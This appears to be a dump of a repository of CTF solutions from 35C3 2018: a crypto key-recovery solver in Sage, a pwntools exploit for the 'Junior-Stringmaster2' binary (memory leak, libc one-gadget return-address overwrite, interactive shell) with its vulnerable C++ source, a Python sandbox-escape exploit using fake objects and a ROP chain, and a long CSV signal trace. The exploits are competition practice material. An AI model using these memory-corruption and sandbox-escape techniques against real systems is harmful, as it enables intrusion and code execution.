import BitVector from random import SystemRandom from os import urandom if __name__ == "__main__": cipher = CodeBasedEncryptionScheme(BitVector(size=48, intVal=222740723777208)) random = SystemRandom() flag = b'' for i in range(31): with open("data/flag_{:02d}".format(i), "rb") as f: flag += cipher.decrypt(f.read()) print(flag) ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/solve.sage ================================================ #!/usr/bin/env sage # coding=utf-8 import pickle r = Zmod(2) equations = [] result = [] def bitvector_from_bytes(bs): tmp = Integer(bs.encode('hex'), 16).bits() tmp += [0] * (len(bs)*8-len(tmp)) tmp.reverse() return vector(r, tmp) def parse_ctext(ctext): # transposition c = bitvector_from_bytes(ctext[-6:]) m = matrix([bitvector_from_bytes(ctext[i:i+6]) for i in xrange(0, len(ctext)-6, 6)]) return m, c def get_equations(s): global equations global result m, p, c = s mc = m.columns() for i in xrange(0, len(mc), 3): equations.append(mc[i]+mc[i+1]+mc[i+2]) result.append(c[i]+c[i+1]+c[i+2]-p[i]-p[i+1]-p[i+2]+1) if __name__ == '__main__': ''' data = [] print 'start' for i in xrange(1536): if i % 10 == 0: print i with open('data/ciphertext_{:03d}'.format(i)) as f: test1 = f.read() m, c = parse_ctext(test1) with open('data/plaintext_{:03d}'.format(i)) as f: test2 = f.read() p = bitvector_from_bytes(test2) p = vector(sum([[i,i,i] for i in p], [])) data.append((m, p, c)) print 'data finish' with open('mpc_data', 'wb') as f: pickle.dump(data, f) ''' with open('mpc_data', 'rb') as f: data = pickle.load(f) for i in xrange(0, 1536): get_equations(data[i]) equations_matrix = matrix(equations) rank = equations_matrix.rank() print i, rank if rank >= 48: result_vector = vector(r, result) key = equations_matrix.solve_right(result_vector) key_val = int(''.join(map(str, key)), 2) print key_val break ================================================ FILE: 2018/35c3-2018/pwn/Junior-Stringmaster2/solve.py ================================================ #!/usr/bin/env python # coding=utf-8 from pwn import * p=process('./stringmaster2') #p=remote("35.207.132.47"," 22225") p.recvuntil("String1: ") s1=p.recvline().strip('\n') p.recvuntil("String2: ") s2=p.recvline().strip('\n') def swap(i1,i2): p.sendlineafter("> ","swap %d %d"%(i1,i2)) def replace(c1,c2): info("going to replace %x with %x"%(ord(c1),ord(c2))) p.sendlineafter("[4] quit \n> ","replace %c %c"%(c1,c2)) def printt(): p.sendlineafter("> ","print") def quit(): p.sendlineafter("> ","quit") info("S1: %s"%s1) info("S2: %s"%s2) swap(1,2) #printt() replace('\x00','c') printt() p.recvuntil(s1[0]+s1[2]+s1[1]+s1[3:]) p.recv(40-10) codebase=u64(p.recv(8))-0x2671 info("codebase: 0x%x"%codebase) p.recv(136-48) libcbase=u64(p.recv(8))-0x20830-0x1367 info("libcbase: 0x%x"%libcbase) retaddr=p64(codebase+0x25fb) onegadget=p64(libcbase+0x10a38c)#0x4526a,0xf02a4,0xf1147 info("retaddr: 0x%x"%(codebase+0x25fb)) info("onegadget: 0x%x"%(libcbase+0x4f2c5)) printt() print retaddr in p.recvuntil(retaddr) for i in range(1): replace(retaddr[0],onegadget[0]) for i in range(1): replace(retaddr[1],onegadget[1]) for i in range(4): replace(retaddr[2],onegadget[2]) for i in range(4): replace(retaddr[3],onegadget[3]) for i in range(4): replace(retaddr[4],onegadget[4]) for i in range(4): replace(retaddr[5],onegadget[5]) # context.log_level='debug' ''' for i in range(6): print i j=0 while (1): j=j+1 replace(retaddr[i],onegadget[i]) printt() if not retaddr in p.recvuntil(retaddr,timeout=1000): retaddr=retaddr[:i]+onegadget[i]+retaddr[i+1:] info("new retaddr: 0x%x"%u64(retaddr)) info("onegadget: 0x%x"%u64(onegadget)) info("J: %d"%j) break else: print "fail to replace" ''' #p.recvuntil("\x6d\x24\x40") #replace("\x6d","\xa7") #replace("\x6d","\xa7") #replace("\x24",'\x11') #replace("\x24",'\x11') quit() p.interactive() ================================================ FILE: 2018/35c3-2018/pwn/Junior-Stringmaster2/stringmaster2.cpp ================================================ #include #include #include #include #include #include using namespace std; const string chars = "abcdefghijklmnopqrstuvwxy"; void print_menu() { cout << endl; cout << "Enter the command you want to execute:" << endl; cout << "[1] swap (Cost: 1)" << endl; cout << "[2] replace (Cost: 1)" << endl; cout << "[3] print (Cost: 1)" << endl; cout << "[4] quit " << endl; cout << "> "; } void play() { string from(10, '\00'); string to(10, '\00'); for (int i = 0; i < 10; ++i) { from[i] = chars[rand() % (chars.length() - 1)]; to[i] = chars[rand() % (chars.length() - 1)]; } cout << "Perform the following operations on String1 to generate String2 with minimum costs." << endl << endl; cout << "[1] swap (Cost: 1)" << endl; cout << " Swaps the char at index1 with the char at index2 " << endl; cout << "[2] replace (Cost: 1)" << endl; cout << " Replaces the first occurence of char1 with char2 " << endl; cout << "[3] print (Cost: 1)" << endl; cout << " Prints the current version of the string " << endl; cout << "[4] quit " << endl; cout << " Give up and leave the game " << endl; cout << endl; cout << "String1: " << from << endl; cout << "String2: " << to << endl; cout << endl; unsigned int costs = 0; string s(from); while (true) { print_menu(); string command; cin >> command; if (command == "swap") { unsigned int i1, i2; cin >> i1 >> i2; if (cin.good() && i1 < s.length() && i2 < s.length()) { swap(s[i1], s[i2]); } costs += 1; } else if (command == "replace") { char c1, c2; cin >> c1 >> c2; auto index = s.find(c1); cout << c1 << c2 << index << endl; if (index >= 0) { s[index] = c2; } costs += 1; } else if (command == "print") { cout << s << endl; costs += 1; } else if (command == "quit") { cout << "You lost." << endl; break; } else { cout << "Invalid command" << endl; } if (!cin) { cin.clear(); cin.ignore(numeric_limits::max(), '\n'); } if (!cout) { cout.clear(); } if (s == to) { cout << s.length() << endl; cout << endl; cout << "****************************************" << endl; cout << "* Congratulations " << endl; cout << "* You solved the problem with cost: " << costs << endl; cout << "****************************************" << endl; cout << endl; break; } } } int main() { srand(time(nullptr)); play(); } ================================================ FILE: 2018/35c3-2018/pwn/collection/exp.py ================================================ from sys import modules del modules['os'] import Collection keys = list(__builtins__.__dict__.keys()) for k in keys: if k != 'id' and k != 'hex' and k != 'print' and k != 'range': del __builtins__.__dict__[k] def p64(x): return x.to_bytes(8, 'little') def u64(x): x = x[::-1] res = 0 for i in range(0,8): res = x[i] + (res << 8 ) return res def fake(addr): fake_bytearray = p64(0xff) fake_bytearray += p64(0x9ce7e0) fake_bytearray += p64(0x8) fake_bytearray += p64(0x9) fake_bytearray += p64(addr) fake_bytearray += p64(addr) fake_bytearray += p64(0) fake_list_ob_item = p64(id(fake_bytearray)+0x20) fake_list = p64(0xff) fake_list += p64(0x9c8a80) fake_list += p64(1) fake_list += p64(id(fake_list_ob_item)+0x20) fake_list += p64(1) x = Collection.Collection({'a':1, 'b':[1]}) y = Collection.Collection({'b':[1], 'a':id(fake_list)+0x20}) l = y.get('b')[0] return l def r64(addr): l = fake(addr) return u64(l) def w64(addr, data): l = fake(addr) for i in range(8): l[i] = p64(data)[i] memcpy_got = 0x9b3dc0 libc_base = r64(memcpy_got) - 0xbb520 print('[*] libc base: ' + hex(libc_base)) flag = b'*'*0x100 fake_iovec = p64(id(flag)+0x20) fake_iovec += p64(0x100) rop = p64(libc_base + 0x2155f) # pop rdi rop += p64(1023) rop += p64(libc_base + 0x1306D9) # pop rdx; pop rsi; ret rop += p64(1) rop += p64(id(fake_iovec)+0x20) rop += p64(libc_base + 0x116600) rop += p64(libc_base + 0x2155f) # pop rdi rop += p64(1) rop += p64(libc_base + 0x1306D9) # pop rdx; pop rsi; ret rop += p64(0x40) rop += p64(id(flag)+0x20) rop += p64(libc_base + 0x110140) rop += p64(0xdeadbeaf) pivot = p64(id(rop) + 0x20) pivot += p64(libc_base + 0x520EF) # ret x = Collection.Collection({'a':id(pivot)-0xa0+0x20}) collect_base = id(x) - 0x430e68 - 0x25000# 0x7ffff6423000 print('[*] collect base: ' + hex(collect_base)) w64(collect_base + 0x204040, libc_base + 0x520a5) # PyLong_FromLong print('b *'+hex(libc_base+0x520a5)) x.get('a') ================================================ FILE: 2018/35c3-2018/re/box_of_blink/blink2.csv ================================================ A,B,C,D,E,R1,R2,B1,B2,G1,G2,LAT,CLK,OE,Label 0,0,0,1,0,1,0,0,0,1,0,0,0,0,-1.0000000e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,1,-9.2358800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,1,-9.2336400e-04 1,0,0,1,0,1,0,0,0,1,0,1,0,1,-9.2333600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,1,-9.2331200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,1,-9.2301200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,1,-9.2298000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,1,-9.2293200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,1,-9.2290800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,1,-9.2286000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,1,-9.2282800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,1,-9.2278000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2275600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2270400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2268000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2267600e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2266000e-04 1,0,0,1,0,1,0,0,0,0,0,0,0,0,-9.2262800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2262400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2260400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2258000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2257600e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2255600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2253200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2252400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2248000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2245600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2240400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2238000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2233200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2230800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2225200e-04 1,0,0,1,0,0,0,0,0,1,0,0,0,0,-9.2222800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2222400e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2220400e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2218000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2217200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2215600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2213200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2212800e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2210800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2208400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2207600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2203200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2200800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2195600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2193200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2188400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2186000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2180800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2178000e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2175600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2173200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2172400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2170800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2168400e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2167600e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2166000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2163200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2162800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2158000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2155600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2150800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2148400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2143200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2140800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2135600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2133200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2132800e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2130800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2128400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2127600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2126000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2123200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2120800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2118000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2115600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2113200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2110800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2108000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2105600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2102800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2100400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2098000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2095600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2093200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2090800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2088000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2082800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2080400e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2080000e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2075600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2073200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2072400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2068000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2065600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2060400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2058000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2052800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2050000e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2047600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2045600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2044400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2042800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2040400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2038000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2035200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2032800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2030000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2027600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2025200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2022800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2020400e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2019600e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2015200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2012800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2012000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2010000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2007600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.2005200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.2002800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.2002400e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.2000400e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1998000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1997200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1992800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1990000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1985200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1982800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1978000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1975200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1970000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1967600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1967200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1965200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1962800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1962000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1960400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1958000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1955200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1952800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1950000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1947600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1945200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1942800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1940400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1938000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1935200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1932800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1930000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1927600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1925200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1922800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1922000e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1918000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1915200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1912800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1910000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1909600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1905200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1902800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1898000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1895200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1890000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1887600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1887200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1885200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1882800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1882000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1880400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1878000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1875200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1872800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1867600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1865200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1860400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1858000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1857200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1852800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1850000e-04 1,0,0,1,0,1,0,0,0,0,0,0,0,0,-9.1849600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1849200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1845200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1842800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1838000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1835200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1832800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1830000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1827600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1824800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1819600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1817200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1812400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1810000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1809200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1804800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1802000e-04 1,0,0,1,0,1,0,0,0,0,0,0,0,0,-9.1801600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1801200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1797200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1794800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1790000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1787200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1784800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1782000e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1777200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1774800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1774000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1772400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1770000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1767200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1764800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1762400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1759600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1757200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1754800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1754400e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1750000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1747200e-04 1,0,0,1,0,1,0,0,0,0,0,0,0,0,-9.1746800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1746400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1744800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1742000e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1737200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1734800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1734000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1732400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1730000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1727200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1724800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1722000e-04 1,0,0,1,0,0,0,0,0,1,0,0,0,0,-9.1719600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1719200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1717200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1714800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1714000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1710000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1707200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1704800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1702000e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1699600e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1697200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1696400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1692400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1690000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1684800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1682000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1677200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1674800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1670000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1667200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1666800e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1664800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1662000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1661600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1659600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1657200e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1656800e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1652400e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1650000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1649200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1647200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1644800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1642400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1639600e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1637200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1634800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1632400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1630000e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1629200e-04 1,0,0,1,0,1,0,0,0,1,0,0,1,0,-9.1624800e-04 1,0,0,1,0,1,0,0,0,1,0,0,0,0,-9.1622000e-04 1,0,0,1,0,1,0,0,0,0,0,0,0,0,-9.1621600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1621200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1619600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1617200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1614800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1612400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1610000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1607200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1604800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1602000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1599600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1597200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1594800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1592400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1590000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1587200e-04 